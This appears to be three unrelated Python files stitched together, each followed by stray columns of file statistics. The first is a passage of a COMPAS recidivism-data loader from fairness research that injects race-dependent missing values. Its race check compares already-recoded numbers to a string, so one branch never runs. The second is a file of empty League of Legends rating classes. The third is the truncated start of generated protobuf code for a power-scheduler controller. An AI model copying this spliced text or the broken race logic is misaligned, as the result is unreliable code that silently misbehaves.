df = dfcutQ[features]
return df
XD_features = [
'age_cat',
'c_charge_degree',
'priors_count',
'race',
'score_text']
D_features = [
'race'] if protected_attributes is None else protected_attributes
Y_features = ['two_year_recid']
X_features = list(set(XD_features) - set(D_features))
categorical_features = [
'age_cat',
'priors_count',
'c_charge_degree',
'score_text']
# privileged classes
all_privileged_classes = {"sex": [1.0],
"race": [1.0]}
# protected attribute maps
all_protected_attribute_maps = {
"sex": {
0.0: 'Male', 1.0: 'Female'}, "race": {
1.0: 'Caucasian', 0.0: 'Not Caucasian'}}
return CompasDataset_test(
label_name=Y_features[0],
favorable_classes=[0],
protected_attribute_names=D_features,
privileged_classes=[all_privileged_classes[x] for x in D_features],
instance_weights_name=None,
categorical_features=categorical_features,
features_to_keep=X_features + Y_features + D_features,
na_values=[],
metadata={'label_maps': [{1.0: 'Did recid.', 0.0: 'No recid.'}],
'protected_attribute_maps': [all_protected_attribute_maps[x]
for x in D_features]},
custom_preprocessing=custom_preprocessing)
class CompasDataset_train(StandardDataset):
def __init__(
self,
label_name='two_year_recid',
favorable_classes=[0],
protected_attribute_names=[
'sex',
'race'],
privileged_classes=[
['Female'],
['Caucasian']],
instance_weights_name=None,
categorical_features=[
'age_cat',
'c_charge_degree',
'c_charge_desc'],
features_to_keep=[
'sex',
'age',
'age_cat',
'race',
'juv_fel_count',
'juv_misd_count',
'juv_other_count',
'priors_count',
'c_charge_degree',
'c_charge_desc',
'two_year_recid',
'length_of_stay'],
features_to_drop=[],
na_values=[],
custom_preprocessing=default_preprocessing,
metadata=default_mappings):
np.random.seed(1)
def quantizePrior1(x):
if x <= 0:
return 0
elif 1 <= x <= 3:
return 1
else:
return 2
def quantizeLOS(x):
if x <= 7:
return 0
if 8 < x <= 93:
return 1
else:
return 2
def group_race(x):
if x == "Caucasian":
return 1.0
else:
return 0.0
filepath = 'data/compas/compas-train.csv'
df = pd.read_csv(filepath, index_col='id', na_values=[])
df['age_cat'] = df['age_cat'].replace('Greater than 45', 2)
df['age_cat'] = df['age_cat'].replace('25 - 45', 1)
df['age_cat'] = df['age_cat'].replace('Less than 25', 0)
df['score_text'] = df['score_text'].replace('High', 1)
df['score_text'] = df['score_text'].replace('Medium', 1)
df['score_text'] = df['score_text'].replace('Low', 0)
df['priors_count'] = df['priors_count'].apply(
lambda x: quantizePrior1(x))
df['length_of_stay'] = (pd.to_datetime(df['c_jail_out']) -
pd.to_datetime(df['c_jail_in'])).apply(
lambda x: x.days)
df['length_of_stay'] = df['length_of_stay'].apply(
lambda x: quantizeLOS(x))
df = df.loc[~df['race'].isin(
['Native American', 'Hispanic', 'Asian', 'Other']), :]
df['c_charge_degree'] = df['c_charge_degree'].replace({'F': 0, 'M': 1})
ix = df['days_b_screening_arrest'] <= 30
ix = (df['days_b_screening_arrest'] >= -30) & ix
ix = (df['is_recid'] != -1) & ix
ix = (df['c_charge_degree'] != "O") & ix
ix = (df['score_text'] != 'N/A') & ix
df = df.loc[ix, :]
df['c_charge_degree'] = df['c_charge_degree'].replace({0: 'F', 1: 'M'})
super(
CompasDataset_train,
self).__init__(
df=df,
label_name=label_name,
favorable_classes=favorable_classes,
protected_attribute_names=protected_attribute_names,
privileged_classes=privileged_classes,
instance_weights_name=instance_weights_name,
categorical_features=categorical_features,
features_to_keep=features_to_keep,
features_to_drop=features_to_drop,
na_values=na_values,
custom_preprocessing=custom_preprocessing,
metadata=metadata)
def load_preproc_data_compas_test_comb(protected_attributes=None):
def custom_preprocessing(df):
"""The custom pre-processing function is adapted from
https://github.com/fair-preprocessing/nips2017/blob/master/compas/code/Generate_Compas_Data.ipynb
"""
df = df[['age',
'c_charge_degree',
'race',
'age_cat',
'score_text',
'sex',
'priors_count',
'days_b_screening_arrest',
'decile_score',
'is_recid',
'two_year_recid',
'length_of_stay']]
# Indices of data samples to keep
ix = df['days_b_screening_arrest'] <= 30
ix = (df['days_b_screening_arrest'] >= -30) & ix
ix = (df['is_recid'] != -1) & ix
ix = (df['c_charge_degree'] != "O") & ix
ix = (df['score_text'] != 'N/A') & ix
df = df.loc[ix, :]
# Restrict races to African-American and Caucasian
dfcut = df.loc[~df['race'].isin(
['Native American', 'Hispanic', 'Asian', 'Other']), :]
# Restrict the features to use
dfcutQ = dfcut[['sex',
'race',
'age_cat',
'c_charge_degree',
'score_text',
'priors_count',
'is_recid',
'two_year_recid',
'length_of_stay']].copy()
# Quantize priors count between 0, 1-3, and >3
def quantizePrior(x):
if x == 0:
return '0'
elif x == 1:
return '1 to 3'
elif x == 2:
return 'More than 3'
else:
return 'missing'
# Quantize length of stay
def quantizeLOS(x):
if x == 0:
return '<week'
if x == 1:
return '<3months'
else:
return '>3 months'
# Quantize length of stay
def adjustAge(x):
if x == 1:
return '25 to 45'
elif x == 2:
return 'Greater than 45'
elif x == 0:
return 'Less than 25'
# Quantize score_text to MediumHigh
def quantizeScore(x):
if x == 1:
return 'MediumHigh'
else:
return 'Low'
def group_race(x):
if x == "Caucasian":
return 1.0
else:
return 0.0
dfcutQ['priors_count'] = dfcutQ['priors_count'].apply(
lambda x: quantizePrior(x))
dfcutQ['length_of_stay'] = dfcutQ['length_of_stay'].apply(
lambda x: quantizeLOS(x))
dfcutQ['score_text'] = dfcutQ['score_text'].apply(
lambda x: quantizeScore(x))
dfcutQ['age_cat'] = dfcutQ['age_cat'].apply(lambda x: adjustAge(x))
# Recode sex and race
dfcutQ['sex'] = dfcutQ['sex'].replace({'Female': 1.0, 'Male': 0.0})
dfcutQ['race'] = dfcutQ['race'].apply(lambda x: group_race(x))
features = ['two_year_recid', 'race',
'age_cat', 'priors_count', 'c_charge_degree', 'score_text']
# Pass vallue to df
df = dfcutQ[features]
df['mis_prob'] = 0
for index, row in df.iterrows():
if row['race'] != 'African-American' and row['two_year_recid']==0:
df.loc[index, 'mis_prob'] = 0.3
elif row['race'] != 'African-American':
df.loc[index, 'mis_prob'] = 0.1
else:
df.loc[index, 'mis_prob'] = 0.05
new_label = []
for index, row in df.iterrows():
if np.random.binomial(1, float(row['mis_prob']), 1)[0] == 1:
new_label.append('missing')
else:
new_label.append(row['priors_count'])
df['priors_count'] = new_label
return df
XD_features = [
'age_cat',
'c_charge_degree',
'priors_count',
'race',
'score_text']
D_features = [
'race'] if protected_attributes is None else protected_attributes
Y_features = ['two_year_recid']
X_features = list(set(XD_features) - set(D_features))
categorical_features = [
'age_cat',
'priors_count',
'c_charge_degree',
'score_text']
# privileged classes
all_privileged_classes = {"sex": [1.0],
"race": [1.0]}
# protected attribute maps
all_protected_attribute_maps = {
"sex": {
0.0: 'Male', 1.0: 'Female'}, "race": {
1.0: 'Caucasian', 0.0: 'Not Caucasian'}}
return CompasDataset_test(
label_name=Y_features[0],
favorable_classes=[0],
protected_attribute_names=D_features,
privileged_classes=[all_privileged_classes[x] for x in D_features],
instance_weights_name=None,
categorical_features=categorical_features,
features_to_keep=X_features + Y_features + D_features,
na_values=[],
metadata={'label_maps': [{1.0: 'Did recid.', 0.0: 'No recid.'}],
'protected_attribute_maps': [all_protected_attribute_maps[x]
for x in D_features]},
custom_preprocessing=custom_preprocessing)
| 34.978882
| 139
| 0.517118
| 3,219
| 28,158
| 4.278347
| 0.097856
| 0.017427
| 0.032094
| 0.017427
| 0.86763
| 0.851873
| 0.836407
| 0.820505
| 0.817746
| 0.812373
| 0
| 0.027385
| 0.350273
| 28,158
| 805
| 140
| 34.978882
| 0.725389
| 0.07259
| 0
| 0.854294
| 0
| 0
| 0.169803
| 0.013495
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047546
| false
| 0
| 0.021472
| 0
| 0.165644
| 0.018405
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cec85725b51c39f0e02e3adaa7d333b95766f6c6
| 6,545
|
py
|
Python
|
loldib/getratings/models/NA/na_draven/na_draven_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_draven/na_draven_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_draven/na_draven_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Draven_Sup_Aatrox(Ratings):
pass
class NA_Draven_Sup_Ahri(Ratings):
pass
class NA_Draven_Sup_Akali(Ratings):
pass
class NA_Draven_Sup_Alistar(Ratings):
pass
class NA_Draven_Sup_Amumu(Ratings):
pass
class NA_Draven_Sup_Anivia(Ratings):
pass
class NA_Draven_Sup_Annie(Ratings):
pass
class NA_Draven_Sup_Ashe(Ratings):
pass
class NA_Draven_Sup_AurelionSol(Ratings):
pass
class NA_Draven_Sup_Azir(Ratings):
pass
class NA_Draven_Sup_Bard(Ratings):
pass
class NA_Draven_Sup_Blitzcrank(Ratings):
pass
class NA_Draven_Sup_Brand(Ratings):
pass
class NA_Draven_Sup_Braum(Ratings):
pass
class NA_Draven_Sup_Caitlyn(Ratings):
pass
class NA_Draven_Sup_Camille(Ratings):
pass
class NA_Draven_Sup_Cassiopeia(Ratings):
pass
class NA_Draven_Sup_Chogath(Ratings):
pass
class NA_Draven_Sup_Corki(Ratings):
pass
class NA_Draven_Sup_Darius(Ratings):
pass
class NA_Draven_Sup_Diana(Ratings):
pass
class NA_Draven_Sup_Draven(Ratings):
pass
class NA_Draven_Sup_DrMundo(Ratings):
pass
class NA_Draven_Sup_Ekko(Ratings):
pass
class NA_Draven_Sup_Elise(Ratings):
pass
class NA_Draven_Sup_Evelynn(Ratings):
pass
class NA_Draven_Sup_Ezreal(Ratings):
pass
class NA_Draven_Sup_Fiddlesticks(Ratings):
pass
class NA_Draven_Sup_Fiora(Ratings):
pass
class NA_Draven_Sup_Fizz(Ratings):
pass
class NA_Draven_Sup_Galio(Ratings):
pass
class NA_Draven_Sup_Gangplank(Ratings):
pass
class NA_Draven_Sup_Garen(Ratings):
pass
class NA_Draven_Sup_Gnar(Ratings):
pass
class NA_Draven_Sup_Gragas(Ratings):
pass
class NA_Draven_Sup_Graves(Ratings):
pass
class NA_Draven_Sup_Hecarim(Ratings):
pass
class NA_Draven_Sup_Heimerdinger(Ratings):
pass
class NA_Draven_Sup_Illaoi(Ratings):
pass
class NA_Draven_Sup_Irelia(Ratings):
pass
class NA_Draven_Sup_Ivern(Ratings):
pass
class NA_Draven_Sup_Janna(Ratings):
pass
class NA_Draven_Sup_JarvanIV(Ratings):
pass
class NA_Draven_Sup_Jax(Ratings):
pass
class NA_Draven_Sup_Jayce(Ratings):
pass
class NA_Draven_Sup_Jhin(Ratings):
pass
class NA_Draven_Sup_Jinx(Ratings):
pass
class NA_Draven_Sup_Kalista(Ratings):
pass
class NA_Draven_Sup_Karma(Ratings):
pass
class NA_Draven_Sup_Karthus(Ratings):
pass
class NA_Draven_Sup_Kassadin(Ratings):
pass
class NA_Draven_Sup_Katarina(Ratings):
pass
class NA_Draven_Sup_Kayle(Ratings):
pass
class NA_Draven_Sup_Kayn(Ratings):
pass
class NA_Draven_Sup_Kennen(Ratings):
pass
class NA_Draven_Sup_Khazix(Ratings):
pass
class NA_Draven_Sup_Kindred(Ratings):
pass
class NA_Draven_Sup_Kled(Ratings):
pass
class NA_Draven_Sup_KogMaw(Ratings):
pass
class NA_Draven_Sup_Leblanc(Ratings):
pass
class NA_Draven_Sup_LeeSin(Ratings):
pass
class NA_Draven_Sup_Leona(Ratings):
pass
class NA_Draven_Sup_Lissandra(Ratings):
pass
class NA_Draven_Sup_Lucian(Ratings):
pass
class NA_Draven_Sup_Lulu(Ratings):
pass
class NA_Draven_Sup_Lux(Ratings):
pass
class NA_Draven_Sup_Malphite(Ratings):
pass
class NA_Draven_Sup_Malzahar(Ratings):
pass
class NA_Draven_Sup_Maokai(Ratings):
pass
class NA_Draven_Sup_MasterYi(Ratings):
pass
class NA_Draven_Sup_MissFortune(Ratings):
pass
class NA_Draven_Sup_MonkeyKing(Ratings):
pass
class NA_Draven_Sup_Mordekaiser(Ratings):
pass
class NA_Draven_Sup_Morgana(Ratings):
pass
class NA_Draven_Sup_Nami(Ratings):
pass
class NA_Draven_Sup_Nasus(Ratings):
pass
class NA_Draven_Sup_Nautilus(Ratings):
pass
class NA_Draven_Sup_Nidalee(Ratings):
pass
class NA_Draven_Sup_Nocturne(Ratings):
pass
class NA_Draven_Sup_Nunu(Ratings):
pass
class NA_Draven_Sup_Olaf(Ratings):
pass
class NA_Draven_Sup_Orianna(Ratings):
pass
class NA_Draven_Sup_Ornn(Ratings):
pass
class NA_Draven_Sup_Pantheon(Ratings):
pass
class NA_Draven_Sup_Poppy(Ratings):
pass
class NA_Draven_Sup_Quinn(Ratings):
pass
class NA_Draven_Sup_Rakan(Ratings):
pass
class NA_Draven_Sup_Rammus(Ratings):
pass
class NA_Draven_Sup_RekSai(Ratings):
pass
class NA_Draven_Sup_Renekton(Ratings):
pass
class NA_Draven_Sup_Rengar(Ratings):
pass
class NA_Draven_Sup_Riven(Ratings):
pass
class NA_Draven_Sup_Rumble(Ratings):
pass
class NA_Draven_Sup_Ryze(Ratings):
pass
class NA_Draven_Sup_Sejuani(Ratings):
pass
class NA_Draven_Sup_Shaco(Ratings):
pass
class NA_Draven_Sup_Shen(Ratings):
pass
class NA_Draven_Sup_Shyvana(Ratings):
pass
class NA_Draven_Sup_Singed(Ratings):
pass
class NA_Draven_Sup_Sion(Ratings):
pass
class NA_Draven_Sup_Sivir(Ratings):
pass
class NA_Draven_Sup_Skarner(Ratings):
pass
class NA_Draven_Sup_Sona(Ratings):
pass
class NA_Draven_Sup_Soraka(Ratings):
pass
class NA_Draven_Sup_Swain(Ratings):
pass
class NA_Draven_Sup_Syndra(Ratings):
pass
class NA_Draven_Sup_TahmKench(Ratings):
pass
class NA_Draven_Sup_Taliyah(Ratings):
pass
class NA_Draven_Sup_Talon(Ratings):
pass
class NA_Draven_Sup_Taric(Ratings):
pass
class NA_Draven_Sup_Teemo(Ratings):
pass
class NA_Draven_Sup_Thresh(Ratings):
pass
class NA_Draven_Sup_Tristana(Ratings):
pass
class NA_Draven_Sup_Trundle(Ratings):
pass
class NA_Draven_Sup_Tryndamere(Ratings):
pass
class NA_Draven_Sup_TwistedFate(Ratings):
pass
class NA_Draven_Sup_Twitch(Ratings):
pass
class NA_Draven_Sup_Udyr(Ratings):
pass
class NA_Draven_Sup_Urgot(Ratings):
pass
class NA_Draven_Sup_Varus(Ratings):
pass
class NA_Draven_Sup_Vayne(Ratings):
pass
class NA_Draven_Sup_Veigar(Ratings):
pass
class NA_Draven_Sup_Velkoz(Ratings):
pass
class NA_Draven_Sup_Vi(Ratings):
pass
class NA_Draven_Sup_Viktor(Ratings):
pass
class NA_Draven_Sup_Vladimir(Ratings):
pass
class NA_Draven_Sup_Volibear(Ratings):
pass
class NA_Draven_Sup_Warwick(Ratings):
pass
class NA_Draven_Sup_Xayah(Ratings):
pass
class NA_Draven_Sup_Xerath(Ratings):
pass
class NA_Draven_Sup_XinZhao(Ratings):
pass
class NA_Draven_Sup_Yasuo(Ratings):
pass
class NA_Draven_Sup_Yorick(Ratings):
pass
class NA_Draven_Sup_Zac(Ratings):
pass
class NA_Draven_Sup_Zed(Ratings):
pass
class NA_Draven_Sup_Ziggs(Ratings):
pass
class NA_Draven_Sup_Zilean(Ratings):
pass
class NA_Draven_Sup_Zyra(Ratings):
pass
| 15.695444
| 46
| 0.766692
| 972
| 6,545
| 4.736626
| 0.151235
| 0.209818
| 0.389661
| 0.479583
| 0.803432
| 0.803432
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169748
| 6,545
| 416
| 47
| 15.733173
| 0.847258
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
0c8f929d737e1e8e3a837b837e215df8c9a40961
| 43,557
|
py
|
Python
|
venv/lib/python3.8/site-packages/spaceone/api/power_scheduler/v1/controller_pb2.py
|
choonho/plugin-prometheus-mon-webhook
|
afa7d65d12715fd0480fb4f92a9c62da2d6128e0
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.8/site-packages/spaceone/api/power_scheduler/v1/controller_pb2.py
|
choonho/plugin-prometheus-mon-webhook
|
afa7d65d12715fd0480fb4f92a9c62da2d6128e0
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.8/site-packages/spaceone/api/power_scheduler/v1/controller_pb2.py
|
choonho/plugin-prometheus-mon-webhook
|
afa7d65d12715fd0480fb4f92a9c62da2d6128e0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: spaceone/api/power_scheduler/v1/controller.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from google.protobuf import struct_pb2 as google_dot_protobuf_dot_struct__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from spaceone.api.core.v1 import query_pb2 as spaceone_dot_api_dot_core_dot_v1_dot_query__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='spaceone/api/power_scheduler/v1/controller.proto',
package='spaceone.api.power_scheduler.v1',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n0spaceone/api/power_scheduler/v1/controller.proto\x12\x1fspaceone.api.power_scheduler.v1\x1a\x1bgoogle/protobuf/empty.proto\x1a\x1cgoogle/protobuf/struct.proto\x1a\x1cgoogle/api/annotations.proto\x1a spaceone/api/core/v1/query.proto\"\x97\x01\n\nPluginInfo\x12\x11\n\tplugin_id\x18\x01 \x01(\t\x12\x0f\n\x07version\x18\x02 \x01(\t\x12(\n\x07options\x18\x03 \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x10\n\x08provider\x18\x04 \x01(\t\x12)\n\x08metadata\x18\n \x01(\x0b\x32\x17.google.protobuf.Struct\"\xa3\x01\n\x17\x43reateControllerRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12@\n\x0bplugin_info\x18\x02 \x01(\x0b\x32+.spaceone.api.power_scheduler.v1.PluginInfo\x12%\n\x04tags\x18\x0b \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x11\n\tdomain_id\x18\x16 \x01(\t\"\xba\x01\n\x17UpdateControllerRequest\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\x12@\n\x0bplugin_info\x18\x03 \x01(\x0b\x32+.spaceone.api.power_scheduler.v1.PluginInfo\x12%\n\x04tags\x18\x0b \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x11\n\tdomain_id\x18\x16 \x01(\t\"=\n\x11\x43ontrollerRequest\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\x11\n\tdomain_id\x18\x02 \x01(\t\"N\n\x14GetControllerRequest\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\x11\n\tdomain_id\x18\x02 \x01(\t\x12\x0c\n\x04only\x18\x03 \x03(\t\"u\n\x0f\x43ontrollerQuery\x12*\n\x05query\x18\x01 \x01(\x0b\x32\x1b.spaceone.api.core.v1.Query\x12\x15\n\rcontroller_id\x18\x02 \x01(\t\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\x11\n\tdomain_id\x18\x04 \x01(\t\"\x84\x02\n\x0e\x43ontrollerInfo\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x10\n\x08provider\x18\x03 \x01(\t\x12+\n\ncapability\x18\x04 \x01(\x0b\x32\x17.google.protobuf.Struct\x12@\n\x0bplugin_info\x18\x05 \x01(\x0b\x32+.spaceone.api.power_scheduler.v1.PluginInfo\x12%\n\x04tags\x18\x06 \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x12\n\ncreated_at\x18\x07 \x01(\t\x12\x11\n\tdomain_id\x18\n \x01(\t\"h\n\x0f\x43ontrollersInfo\x12@\n\x07results\x18\x01 \x03(\x0b\x32/.spaceone.api.power_scheduler.v1.ControllerInfo\x12\x13\n\x0btotal_count\x18\x02 \x01(\x05\"^\n\x13\x43ontrollerStatQuery\x12\x34\n\x05query\x18\x01 \x01(\x0b\x32%.spaceone.api.core.v1.StatisticsQuery\x12\x11\n\tdomain_id\x18\x02 \x01(\t\"\x89\x01\n\x0e\x43ontrolRequest\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\'\n\x06\x66ilter\x18\x02 \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x11\n\tsecret_id\x18\x03 \x01(\t\x12\x11\n\tdomain_id\x18\x04 \x01(\t\x12\x11\n\tuse_cache\x18\x05 \x01(\x08\"z\n\x13UpdatePluginRequest\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\x0f\n\x07version\x18\x02 \x01(\t\x12(\n\x07options\x18\x03 \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x11\n\tdomain_id\x18\x04 \x01(\t\"R\n\x13VerifyPluginRequest\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\x11\n\tsecret_id\x18\x02 \x01(\t\x12\x11\n\tdomain_id\x18\x03 \x01(\t2\xc9\x0b\n\nController\x12\x9c\x01\n\x06\x63reate\x12\x38.spaceone.api.power_scheduler.v1.CreateControllerRequest\x1a/.spaceone.api.power_scheduler.v1.ControllerInfo\"\'\x82\xd3\xe4\x93\x02!\"\x1f/power-scheduler/v1/controllers\x12\xab\x01\n\x06update\x12\x38.spaceone.api.power_scheduler.v1.UpdateControllerRequest\x1a/.spaceone.api.power_scheduler.v1.ControllerInfo\"6\x82\xd3\xe4\x93\x02\x30\x1a./power-scheduler/v1/controller/{controller_id}\x12\x8c\x01\n\x06\x64\x65lete\x12\x32.spaceone.api.power_scheduler.v1.ControllerRequest\x1a\x16.google.protobuf.Empty\"6\x82\xd3\xe4\x93\x02\x30*./power-scheduler/v1/controller/{controller_id}\x12\xa5\x01\n\x03get\x12\x35.spaceone.api.power_scheduler.v1.GetControllerRequest\x1a/.spaceone.api.power_scheduler.v1.ControllerInfo\"6\x82\xd3\xe4\x93\x02\x30\x12./power-scheduler/v1/controller/{controller_id}\x12\xbd\x01\n\x04list\x12\x30.spaceone.api.power_scheduler.v1.ControllerQuery\x1a\x30.spaceone.api.power_scheduler.v1.ControllersInfo\"Q\x82\xd3\xe4\x93\x02K\x12\x1f/power-scheduler/v1/controllersZ(\"&/power-scheduler/v1/controllers/search\x12\x83\x01\n\x04stat\x12\x34.spaceone.api.power_scheduler.v1.ControllerStatQuery\x1a\x17.google.protobuf.Struct\",\x82\xd3\xe4\x93\x02&\"$/power-scheduler/v1/controllers/stat\x12\x92\x01\n\x07\x63ontrol\x12/.spaceone.api.power_scheduler.v1.ControlRequest\x1a\x16.google.protobuf.Empty\">\x82\xd3\xe4\x93\x02\x38\"6/power-scheduler/v1/controller/{controller_id}/control\x12\xb5\x01\n\rupdate_plugin\x12\x34.spaceone.api.power_scheduler.v1.UpdatePluginRequest\x1a/.spaceone.api.power_scheduler.v1.ControllerInfo\"=\x82\xd3\xe4\x93\x02\x37\x1a\x35/power-scheduler/v1/controller/{controller_id}/plugin\x12\xa3\x01\n\rverify_plugin\x12\x34.spaceone.api.power_scheduler.v1.VerifyPluginRequest\x1a\x16.google.protobuf.Empty\"D\x82\xd3\xe4\x93\x02>\"</power-scheduler/v1/controller/{controller_id}/plugin/verifyb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,google_dot_protobuf_dot_struct__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,spaceone_dot_api_dot_core_dot_v1_dot_query__pb2.DESCRIPTOR,])
_PLUGININFO = _descriptor.Descriptor(
name='PluginInfo',
full_name='spaceone.api.power_scheduler.v1.PluginInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='plugin_id', full_name='spaceone.api.power_scheduler.v1.PluginInfo.plugin_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='spaceone.api.power_scheduler.v1.PluginInfo.version', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='options', full_name='spaceone.api.power_scheduler.v1.PluginInfo.options', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='provider', full_name='spaceone.api.power_scheduler.v1.PluginInfo.provider', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='metadata', full_name='spaceone.api.power_scheduler.v1.PluginInfo.metadata', index=4,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=209,
serialized_end=360,
)
_CREATECONTROLLERREQUEST = _descriptor.Descriptor(
name='CreateControllerRequest',
full_name='spaceone.api.power_scheduler.v1.CreateControllerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='spaceone.api.power_scheduler.v1.CreateControllerRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='plugin_info', full_name='spaceone.api.power_scheduler.v1.CreateControllerRequest.plugin_info', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tags', full_name='spaceone.api.power_scheduler.v1.CreateControllerRequest.tags', index=2,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.CreateControllerRequest.domain_id', index=3,
number=22, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=363,
serialized_end=526,
)
_UPDATECONTROLLERREQUEST = _descriptor.Descriptor(
name='UpdateControllerRequest',
full_name='spaceone.api.power_scheduler.v1.UpdateControllerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.UpdateControllerRequest.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='spaceone.api.power_scheduler.v1.UpdateControllerRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
